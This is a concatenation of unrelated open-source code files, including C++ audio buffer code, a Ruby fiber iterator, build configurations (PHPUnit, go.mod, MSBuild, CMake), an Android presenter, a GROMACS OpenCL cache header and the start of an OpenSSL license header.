// delegate to offset_resampled().
template<int quality,int range>
#if BLIP_BUFFER_FAST
blip_inline
#endif
void Blip_Synth<quality,range>::offset( blip_time_t t, int delta, Blip_Buffer* buf ) const
{
offset_resampled( t * buf->factor_ + buf->offset_, delta, buf );
}
// update(): set waveform to absolute amplitude 'amp' at time 't' by
// emitting the delta from the previously recorded amplitude.
template<int quality,int range>
#if BLIP_BUFFER_FAST
blip_inline
#endif
void Blip_Synth<quality,range>::update( blip_time_t t, int amp )
{
int delta = amp - impl.last_amp;
impl.last_amp = amp;
offset_resampled( t * impl.buf->factor_ + impl.buf->offset_, delta, impl.buf );
}
// blip_eq_t constructors: treble-only form defaults to 44100 Hz with no
// rolloff/cutoff; full form takes all parameters explicitly.
blip_inline blip_eq_t::blip_eq_t( double t ) :
treble( t ), rolloff_freq( 0 ), sample_rate( 44100 ), cutoff_freq( 0 ) { }
blip_inline blip_eq_t::blip_eq_t( double t, long rf, long sr, long cf ) :
treble( t ), rolloff_freq( rf ), sample_rate( sr ), cutoff_freq( cf ) { }
// Trivial Blip_Buffer accessors.
blip_inline int Blip_Buffer::length() const { return length_; }
blip_inline long Blip_Buffer::samples_avail() const { return (long) (offset_ >> BLIP_BUFFER_ACCURACY); }
blip_inline long Blip_Buffer::sample_rate() const { return sample_rate_; }
blip_inline int Blip_Buffer::output_latency() const { return blip_widest_impulse_ / 2; }
blip_inline long Blip_Buffer::clock_rate() const { return clock_rate_; }
// Setting the clock rate recomputes the fixed-point conversion factor.
blip_inline void Blip_Buffer::clock_rate( long cps ) { factor_ = clock_rate_factor( clock_rate_ = cps ); }
// Snapshot the buffer's read state into this reader; returns bass shift.
blip_inline int Blip_Reader::begin( Blip_Buffer& blip_buf )
{
buf = blip_buf.buffer_;
accum = blip_buf.reader_accum_;
return blip_buf.bass_shift_;
}
// NOTE(review): blip_max_length of 0 appears to mean "no maximum" and
// blip_default_length is the default buffer length in ms — confirm against
// set_sample_rate() in the .cpp.
int const blip_max_length = 0;
int const blip_default_length = 250;
#endif
| {
"pile_set_name": "Github"
} |
require "em/iterator"
module EventMachine
module Synchrony
# Fiber-aware wrapper around EM::Iterator: each iteration method parks the
# calling fiber until every job has finished, then returns, so the caller
# sees a synchronous API. The trade-off (as with the upstream iterator) is
# that concurrency cannot be changed on the fly.
class Iterator < EM::Iterator
  # Iterate synchronously. Accepts the same foreach/after callables as
  # EM::Iterator#each, or a block used as the per-item worker.
  def each(foreach = nil, after = nil, &blk)
    current = Fiber.current
    worker = foreach || blk
    done = proc do
      after.call if after
      current.resume
    end
    Fiber.yield super(worker, done)
  end

  # Map over the items, blocking until the collected results are ready.
  def map(&block)
    current = Fiber.current
    collected = nil
    finished = proc { |res| collected = res; current.resume }
    super(block, finished)
    Fiber.yield
    collected
  end

  # Fold the items into obj. With explicit foreach/after callbacks this is a
  # straight pass-through to EM::Iterator#inject; with a block it behaves
  # synchronously like #map, returning the final accumulator.
  def inject(obj, foreach = nil, after = nil, &block)
    return super(obj, foreach, after) if foreach && after

    current = Fiber.current
    collected = nil
    finished = proc { |res| collected = res; current.resume }
    super(obj, block, finished)
    Fiber.yield
    collected
  end
end
end
end
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="UTF-8"?>
<phpunit backupGlobals="false"
backupStaticAttributes="false"
colors="true">
<testsuites>
<testsuite name="PHP_CodeCoverage">
<directory suffix="Test.php">../Tests/PHP</directory>
</testsuite>
</testsuites>
<logging>
<log type="coverage-text" target="php://stdout"/>
</logging>
<filter>
<whitelist addUncoveredFilesFromWhitelist="true">
<directory suffix=".php">../PHP</directory>
<exclude>
<file>../PHP/CodeCoverage/Autoload.php</file>
</exclude>
</whitelist>
</filter>
</phpunit>
| {
"pile_set_name": "Github"
} |
// Generated source.
// Generator: org.chromium.sdk.internal.wip.tools.protocolgenerator.Generator
// Origin: http://svn.webkit.org/repository/webkit/trunk/Source/WebCore/inspector/Inspector.json@108993
package org.chromium.sdk.internal.wip.protocol.input.dom;
/**
Called when shadow root is pushed into the element.
*/
// NOTE: generated file (see header) — prefer regenerating over hand edits.
@org.chromium.sdk.internal.protocolparser.JsonType
public interface ShadowRootPushedEventData {
/**
Host element id.
*/
long/*See org.chromium.sdk.internal.wip.protocol.common.dom.NodeIdTypedef*/ hostId();
/**
Shadow root.
*/
org.chromium.sdk.internal.wip.protocol.input.dom.NodeValue root();
/**
Event-type descriptor binding the "DOM.shadowRootPushed" wire name to this
parsed type; delegates payload parsing to the generated parser root.
*/
public static final org.chromium.sdk.internal.wip.protocol.input.WipEventType<org.chromium.sdk.internal.wip.protocol.input.dom.ShadowRootPushedEventData> TYPE
= new org.chromium.sdk.internal.wip.protocol.input.WipEventType<org.chromium.sdk.internal.wip.protocol.input.dom.ShadowRootPushedEventData>("DOM.shadowRootPushed", org.chromium.sdk.internal.wip.protocol.input.dom.ShadowRootPushedEventData.class) {
@Override public org.chromium.sdk.internal.wip.protocol.input.dom.ShadowRootPushedEventData parse(org.chromium.sdk.internal.wip.protocol.input.WipGeneratedParserRoot parser, org.json.simple.JSONObject obj) throws org.chromium.sdk.internal.protocolparser.JsonProtocolParseException {
return parser.parseDOMShadowRootPushedEventData(obj);
}
};
}
| {
"pile_set_name": "Github"
} |
RazorDocument - [0..13)::13 - [@foo(LF@**@LF]
MarkupBlock - [0..13)::13
MarkupTextLiteral - [0..0)::0 - [] - Gen<Markup> - SpanEditHandler;Accepts:Any
Marker;[];
CSharpCodeBlock - [0..13)::13
CSharpImplicitExpression - [0..13)::13
CSharpTransition - [0..1)::1 - Gen<None> - SpanEditHandler;Accepts:None
Transition;[@];
CSharpImplicitExpressionBody - [1..13)::12
CSharpCodeBlock - [1..13)::12
CSharpExpressionLiteral - [1..7)::6 - [foo(LF] - Gen<Expr> - ImplicitExpressionEditHandler;Accepts:Any;ImplicitExpression[RTD];K14
Identifier;[foo];
LeftParenthesis;[(];
NewLine;[LF];
RazorComment - [7..11)::4
RazorCommentTransition;[@];
RazorCommentStar;[*];
RazorCommentLiteral;[<Missing>];
RazorCommentStar;[*];
RazorCommentTransition;[@];
CSharpExpressionLiteral - [11..13)::2 - [LF] - Gen<Expr> - ImplicitExpressionEditHandler;Accepts:Any;ImplicitExpression[RTD];K14
NewLine;[LF];
| {
"pile_set_name": "Github"
} |
module github.com/daptin/daptin
go 1.14
// +heroku goVersion go1.15
require (
github.com/GeertJohan/go.rice v1.0.0
github.com/Masterminds/squirrel v1.1.0
github.com/advance512/yaml v0.0.0-20141213031416-e401b2b02685
github.com/alexeyco/simpletable v0.0.0-20180729223640-1fa9009f1080
github.com/anthonynsimon/bild v0.10.0
github.com/araddon/dateparse v0.0.0-20181123171228-21df004e09ca
github.com/artpar/api2go v2.4.4+incompatible
github.com/artpar/api2go-adapter v1.0.1
github.com/artpar/conform v0.0.0-20171227110214-a5409cc587c6
github.com/artpar/go-guerrilla v1.5.2
github.com/artpar/go-httpclient v1.0.0 // indirect
github.com/artpar/go-imap v1.0.3
github.com/artpar/go-imap-idle v1.0.2
github.com/artpar/go-koofrclient v1.0.1 // indirect
github.com/artpar/go-smtp-mta v0.2.0
github.com/artpar/go.uuid v1.2.0
github.com/artpar/parsemail v0.0.0-20190115161936-abc648830b9a
github.com/artpar/rclone v1.50.21
github.com/artpar/resty v1.0.3
github.com/artpar/stats v1.0.2
github.com/artpar/xlsx/v2 v2.0.5
github.com/aviddiviner/gin-limit v0.0.0-20170918012823-43b5f79762c1
github.com/bjarneh/latinx v0.0.0-20120329061922-4dfe9ba2a293
github.com/buraksezer/olric v0.2.0
github.com/corpix/uarand v0.0.0 // indirect
github.com/dgrijalva/jwt-go v3.2.0+incompatible
github.com/disintegration/gift v1.2.1
github.com/dop251/goja v0.0.0-20181125163413-2dd08a5fc665
github.com/emersion/go-message v0.11.1
github.com/emersion/go-msgauth v0.4.0
github.com/etgryphon/stringUp v0.0.0-20121020160746-31534ccd8cac // indirect
github.com/fclairamb/ftpserver v0.0.0-20200221221851-84e5d668e655
github.com/frankban/quicktest v1.7.3 // indirect
github.com/getkin/kin-openapi v0.14.0
github.com/ghodss/yaml v1.0.0
github.com/gin-contrib/gzip v0.0.2
github.com/gin-contrib/static v0.0.0-20181225054800-cf5e10bbd933
github.com/gin-gonic/gin v1.6.3
github.com/go-acme/lego/v3 v3.2.0
github.com/go-gota/gota v0.0.0-20190402185630-1058f871be31
github.com/go-playground/locales v0.13.0
github.com/go-playground/universal-translator v0.17.0
github.com/go-sourcemap/sourcemap v2.1.2+incompatible // indirect
github.com/go-sql-driver/mysql v1.5.0
github.com/gobuffalo/envy v1.9.0 // indirect
github.com/gobuffalo/flect v0.1.5
github.com/gocarina/gocsv v0.0.0-20181213162136-af1d9380204a
github.com/gocraft/health v0.0.0-20170925182251-8675af27fef0
github.com/gohugoio/hugo v0.74.3
github.com/gonum/blas v0.0.0-20181208220705-f22b278b28ac // indirect
github.com/gonum/floats v0.0.0-20181209220543-c233463c7e82 // indirect
github.com/gonum/integrate v0.0.0-20181209220457-a422b5c0fdf2 // indirect
github.com/gonum/internal v0.0.0-20181124074243-f884aa714029 // indirect
github.com/gonum/lapack v0.0.0-20181123203213-e4cdc5a0bff9 // indirect
github.com/gonum/matrix v0.0.0-20181209220409-c518dec07be9 // indirect
github.com/gonum/stat v0.0.0-20181125101827-41a0da705a5b // indirect
github.com/gopherjs/gopherjs v0.0.0-20190915194858-d3ddacdb130f // indirect
github.com/gorilla/feeds v1.1.1
github.com/graphql-go/graphql v0.7.8
github.com/graphql-go/handler v0.2.3
github.com/graphql-go/relay v0.0.0-20171208134043-54350098cfe5
github.com/iancoleman/strcase v0.0.0-20190422225806-e506e3ef7365
github.com/icrowley/fake v0.0.0-20180203215853-4178557ae428
github.com/imroc/req v0.2.4
github.com/jamiealquiza/envy v1.1.0
github.com/jinzhu/copier v0.0.0-20180308034124-7e38e58719c3
github.com/jlaffaye/ftp v0.0.0-20200720194710-13949d38913e
github.com/jmoiron/sqlx v0.0.0-20181024163419-82935fac6c1a
github.com/json-iterator/go v1.1.10
github.com/julienschmidt/httprouter v1.2.0
github.com/kniren/gota v0.10.1 // indirect
github.com/kr/text v0.2.0 // indirect
github.com/labstack/echo v3.3.10+incompatible // indirect
github.com/labstack/gommon v0.2.8 // indirect
github.com/lib/pq v1.1.0
github.com/looplab/fsm v0.0.0-20180515091235-f980bdb68a89
github.com/mattn/go-sqlite3 v1.11.0
github.com/naoina/toml v0.1.1
github.com/pkg/errors v0.9.1
github.com/pquerna/otp v1.2.0
github.com/robfig/cron/v3 v3.0.0
github.com/sadlil/go-trigger v0.0.0-20170328161825-cfc3d83007cd
github.com/siebenmann/smtpd v0.0.0-20170816215504-b93303610bbe // indirect
github.com/simplereach/timeutils v1.2.0 // indirect
github.com/sirupsen/logrus v1.6.0
github.com/smancke/mailck v0.0.0-20180319162224-be54df53c96e
github.com/spf13/cobra v1.0.0
github.com/yangxikun/gin-limit-by-key v0.0.0-20190512072151-520697354d5f
golang.org/x/crypto v0.0.0-20200709230013-948cd5f35899
golang.org/x/net v0.0.0-20200707034311-ab3426394381
golang.org/x/oauth2 v0.0.0-20200107190931-bf48bf16ab8d
golang.org/x/text v0.3.3
golang.org/x/time v0.0.0-20200416051211-89c76fbcd5d1
gonum.org/v1/gonum v0.6.2 // indirect
gopkg.in/go-playground/validator.v9 v9.30.0
gopkg.in/mgo.v2 v2.0.0-20190816093944-a6b53ec6cb22 // indirect
)
replace github.com/Azure/go-autorest => github.com/Azure/go-autorest v13.0.0+incompatible
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectGuid>{9800039D-4AAA-43A4-BB78-FEF6F4836927}</ProjectGuid>
<Keyword>Win32Proj</Keyword>
<RootNamespace>liblz4-dll</RootNamespace>
<OutDir>$(SolutionDir)bin\$(Platform)_$(Configuration)\</OutDir>
<IntDir>$(SolutionDir)bin\obj\$(RootNamespace)_$(Platform)_$(Configuration)\</IntDir>
<ProjectName>liblz4-dll</ProjectName>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<CharacterSet>Unicode</CharacterSet>
<PlatformToolset>v141</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<CharacterSet>Unicode</CharacterSet>
<PlatformToolset>v141</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
<PlatformToolset>v141</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
<PlatformToolset>v141</PlatformToolset>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LinkIncremental>true</LinkIncremental>
<TargetName>liblz4</TargetName>
<IncludePath>$(IncludePath);$(UniversalCRT_IncludePath);$(SolutionDir)..\..\lib;$(VCInstallDir)include;$(VCInstallDir)atlmfc\include;$(WindowsSDK_IncludePath);</IncludePath>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LinkIncremental>true</LinkIncremental>
<TargetName>liblz4</TargetName>
<IncludePath>$(IncludePath);$(UniversalCRT_IncludePath);$(SolutionDir)..\..\lib;$(VCInstallDir)include;$(VCInstallDir)atlmfc\include;$(WindowsSDK_IncludePath);</IncludePath>
<RunCodeAnalysis>true</RunCodeAnalysis>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
<TargetName>liblz4</TargetName>
<IncludePath>$(IncludePath);$(UniversalCRT_IncludePath);$(SolutionDir)..\..\lib;$(VCInstallDir)include;$(VCInstallDir)atlmfc\include;$(WindowsSDK_IncludePath);</IncludePath>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental>
<TargetName>liblz4</TargetName>
<IncludePath>$(IncludePath);$(UniversalCRT_IncludePath);$(SolutionDir)..\..\lib;$(VCInstallDir)include;$(VCInstallDir)atlmfc\include;$(WindowsSDK_IncludePath);</IncludePath>
<RunCodeAnalysis>true</RunCodeAnalysis>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level4</WarningLevel>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;LZ4_DLL_EXPORT=1;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<TreatWarningAsError>true</TreatWarningAsError>
<EnablePREfast>false</EnablePREfast>
</ClCompile>
<Link>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level4</WarningLevel>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;LZ4_DLL_EXPORT=1;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<TreatWarningAsError>true</TreatWarningAsError>
<EnablePREfast>true</EnablePREfast>
<AdditionalOptions>/analyze:stacksize295252 %(AdditionalOptions)</AdditionalOptions>
</ClCompile>
<Link>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<WarningLevel>Level4</WarningLevel>
<PrecompiledHeader>
</PrecompiledHeader>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;NDEBUG;LZ4_DLL_EXPORT=1;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<TreatWarningAsError>false</TreatWarningAsError>
<EnablePREfast>false</EnablePREfast>
</ClCompile>
<Link>
<GenerateDebugInformation>true</GenerateDebugInformation>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<WarningLevel>Level4</WarningLevel>
<PrecompiledHeader>
</PrecompiledHeader>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;NDEBUG;LZ4_DLL_EXPORT=1;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<TreatWarningAsError>false</TreatWarningAsError>
<EnablePREfast>true</EnablePREfast>
<AdditionalOptions>/analyze:stacksize295252 %(AdditionalOptions)</AdditionalOptions>
</ClCompile>
<Link>
<GenerateDebugInformation>true</GenerateDebugInformation>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<ClInclude Include="..\..\..\lib\lz4.h" />
<ClInclude Include="..\..\..\lib\lz4frame.h" />
<ClInclude Include="..\..\..\lib\lz4frame_static.h" />
<ClInclude Include="..\..\..\lib\lz4hc.h" />
<ClInclude Include="..\..\..\lib\xxhash.h" />
</ItemGroup>
<ItemGroup>
<ClCompile Include="..\..\..\lib\lz4.c" />
<ClCompile Include="..\..\..\lib\lz4frame.c" />
<ClCompile Include="..\..\..\lib\lz4hc.c" />
<ClCompile Include="..\..\..\lib\xxhash.c" />
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="liblz4-dll.rc" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>
| {
"pile_set_name": "Github"
} |
package com.android.commonapp.presenter;
import com.android.commonapp.contact.BoutiqueContact;
import com.android.commonapp.contact.KnowledgePathContact;
import com.android.commonapp.interfaces.BasePresenterImpl;
import com.android.commonapp.models.BoutiqueModel;
import com.android.commonapp.models.CommonCallModel;
import com.android.commonapp.models.KnowledgePathModel;
import com.android.commonapp.network.CommonCallback;
import com.android.commonapp.network.RetrofitFactory;
import java.util.List;
/**
* @date: 2017/11/23.
* @author: CHEN
* @describe: 知识课件
*/
public class BoutiquePresenter extends BasePresenterImpl<BoutiqueContact.view> implements BoutiqueContact.presenter {
public BoutiquePresenter(BoutiqueContact.view view) {
super(view);
}
@Override
public void getKnowledgeBoutique(String id,String page, String size) {
//参数1 加载说明 参数2 是否需要触屏消失 参数3 是否需要显示进度条
view.showLoadingDialog("数据传输中,请稍后",false,false);
RetrofitFactory.getInstance().api().knowledgeboutique(id,page, size)
.enqueue(new CommonCallback<List<BoutiqueModel>>() {
@Override
protected void onSuccess(CommonCallModel<List<BoutiqueModel>> t) throws Exception {
view.dismissLoadingDialog();
if (t.getData() != null) {
view.success(t.getData());
}
}
@Override
protected void onFailure(Throwable e, boolean isNetWorkError, String msg) throws Exception {
view.dismissLoadingDialog();
view.failure(e, isNetWorkError, msg);
}
});
}
}
| {
"pile_set_name": "Github"
} |
<?php
$expected = array('$a3',
);
$expected_not = array('$a',
'$b',
'$a2',
);
?> | {
"pile_set_name": "Github"
} |
#include "shm_mutex.h"
ShmProcessMutexCheck& ShmProcessMutexCheck::getInstance() {
static ShmProcessMutexCheck singleton;
return singleton;
}
bool ShmProcessMutexCheck::addLock(const std::string& name) {
std::lock_guard<std::mutex> l(m_);
auto p = shmLocks_.emplace(name);
return p.second;
}
bool ShmProcessMutexCheck::removeLock(const std::string& name) {
std::lock_guard<std::mutex> l(m_);
return shmLocks_.erase(name) == 1;
}
| {
"pile_set_name": "Github"
} |
/*
* This file is part of the GROMACS molecular simulation package.
*
* Copyright (c) 2012,2013,2014,2015,2016 by the GROMACS development team.
* Copyright (c) 2018,2019,2020, by the GROMACS development team, led by
* Mark Abraham, David van der Spoel, Berk Hess, and Erik Lindahl,
* and including many others, as listed in the AUTHORS file in the
* top-level source directory and at http://www.gromacs.org.
*
* GROMACS is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public License
* as published by the Free Software Foundation; either version 2.1
* of the License, or (at your option) any later version.
*
* GROMACS is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with GROMACS; if not, see
* http://www.gnu.org/licenses, or write to the Free Software Foundation,
* Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
*
* If you want to redistribute modifications to GROMACS, please
* consider that scientific software is very special. Version
* control is crucial - bugs must be traceable. We will be happy to
* consider code for inclusion in the official distribution, but
* derived work must not be called official GROMACS. Details are found
* in the README & COPYING files - if they are missing, get the
* official version at http://www.gromacs.org.
*
* To help us fund GROMACS development, we humbly ask that you cite
* the research papers on the package. Check out http://www.gromacs.org.
*/
/*! \internal \file
* \brief Declare infrastructure for managing caching of OpenCL
* JIT-ted binaries
*
* This functionality is currently disabled in compileProgram()
*
* \author Dimitrios Karkoulis <[email protected]>
* \author Anca Hamuraru <[email protected]>
* \author Teemu Virolainen <[email protected]>
* \author Mark Abraham <[email protected]>
*/
#ifndef GMX_GPU_UTILS_OCL_CACHING_H
#define GMX_GPU_UTILS_OCL_CACHING_H
#include <string>
#include "gromacs/gpu_utils/oclutils.h"
namespace gmx
{
namespace ocl
{
/*! \brief Construct the name for the binary cache file
*
* \param[in] kernelFilename Name of the kernel from which the binary will be compiled.
* \param[in] deviceId ID of the device upon which the binary is used.
*
* \todo The set of preprocessor options should also form part of the
* identification of the cached binary. Also perhaps compiler, runtime
* and device version info?
*
* \todo Mutual exclusion of ranks and nodes should also be implemented
* if/when caching is re-enabled.
*
* \returns The name of the cache file.
*/
std::string makeBinaryCacheFilename(const std::string& kernelFilename, cl_device_id deviceId);
/*! \brief Check if there's a valid cache available, and return it if so
*
* \param[in] filename Name of valid file containing the binary cache
* \param[in] context The OpenCL context
* \param[in] deviceId The ID of the device on which to use the program
*
* \returns The OpenCL program read from the cache
*
* \throws InternalError if an OpenCL error was encountered
* FileIOError if the file could not be opened
*/
cl_program makeProgramFromCache(const std::string& filename, cl_context context, cl_device_id deviceId);
/*! \brief Implement caching of OpenCL binaries
*
* \param[in] program Index of program to cache
* \param[in] filename Name of file to use for the cache
*
* \throws InternalError if an OpenCL error was encountered
* FileIOError if the file could not be opened
*/
void writeBinaryToCache(cl_program program, const std::string& filename);
} // namespace ocl
} // namespace gmx
#endif
| {
"pile_set_name": "Github"
} |
# Add qdldl
add_subdirectory(qdldl_sources)
if(NOT DEFINED EMBEDDED)
set(
amd_sources
${CMAKE_CURRENT_SOURCE_DIR}/amd/include/amd_internal.h
${CMAKE_CURRENT_SOURCE_DIR}/amd/include/amd.h
${CMAKE_CURRENT_SOURCE_DIR}/amd/include/SuiteSparse_config.h
${CMAKE_CURRENT_SOURCE_DIR}/amd/src/amd_1.c
${CMAKE_CURRENT_SOURCE_DIR}/amd/src/amd_2.c
${CMAKE_CURRENT_SOURCE_DIR}/amd/src/amd_aat.c
${CMAKE_CURRENT_SOURCE_DIR}/amd/src/amd_control.c
${CMAKE_CURRENT_SOURCE_DIR}/amd/src/amd_defaults.c
${CMAKE_CURRENT_SOURCE_DIR}/amd/src/amd_info.c
${CMAKE_CURRENT_SOURCE_DIR}/amd/src/amd_order.c
${CMAKE_CURRENT_SOURCE_DIR}/amd/src/amd_post_tree.c
${CMAKE_CURRENT_SOURCE_DIR}/amd/src/amd_postorder.c
${CMAKE_CURRENT_SOURCE_DIR}/amd/src/amd_preprocess.c
${CMAKE_CURRENT_SOURCE_DIR}/amd/src/amd_valid.c
${CMAKE_CURRENT_SOURCE_DIR}/amd/src/SuiteSparse_config.c
)
endif()
set(qdldl_interface_includes
${CMAKE_CURRENT_SOURCE_DIR}
${CMAKE_CURRENT_SOURCE_DIR}/amd/include
${CMAKE_CURRENT_SOURCE_DIR}/qdldl_sources/include
)
set(qdldl_interface_src
${amd_sources}
${CMAKE_CURRENT_SOURCE_DIR}/qdldl_interface.h
${CMAKE_CURRENT_SOURCE_DIR}/qdldl_interface.c
)
# Create object library for linear system solver interface
add_library(linsys_qdldl OBJECT ${qdldl_interface_src})
target_include_directories(linsys_qdldl PRIVATE ${qdldl_interface_includes} ${PROJECT_SOURCE_DIR}/include)
| {
"pile_set_name": "Github"
} |
/* test/r160test.c */
/* Copyright (C) 1995-1998 Eric Young ([email protected])
* All rights reserved.
*
* This package is an SSL implementation written
* by Eric Young ([email protected]).
* The implementation was written so as to conform with Netscapes SSL.
*
* This library is free for commercial and non-commercial use as long as
* the following conditions are aheared to. The following conditions
* apply to all code found in this distribution, be it the RC4, RSA,
* lhash, DES, etc., code; not just the SSL code. The SSL documentation
* included with this distribution is covered by the same copyright terms
* except that the holder is Tim Hudson ([email protected]).
*
* Copyright remains Eric Young's, and as such any Copyright notices in
* the code are not to be removed.
* If this package is used in a product, Eric Young should be given attribution
* as the author of the parts of the library used.
* This can be in the form of a textual message at program startup or
* in documentation (online or textual) provided with the package.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* 3. All advertising materials mentioning features or use of this software
* must display the following acknowledgement:
* "This product includes cryptographic software written by
* Eric Young ([email protected])"
* The word 'cryptographic' can be left out if the rouines from the library
* being used are not cryptographic related :-).
* 4. If you include any Windows specific code (or a derivative thereof) from
* the apps directory (application code) you must include an acknowledgement:
* "This product includes software written by Tim Hudson ([email protected])"
*
* THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
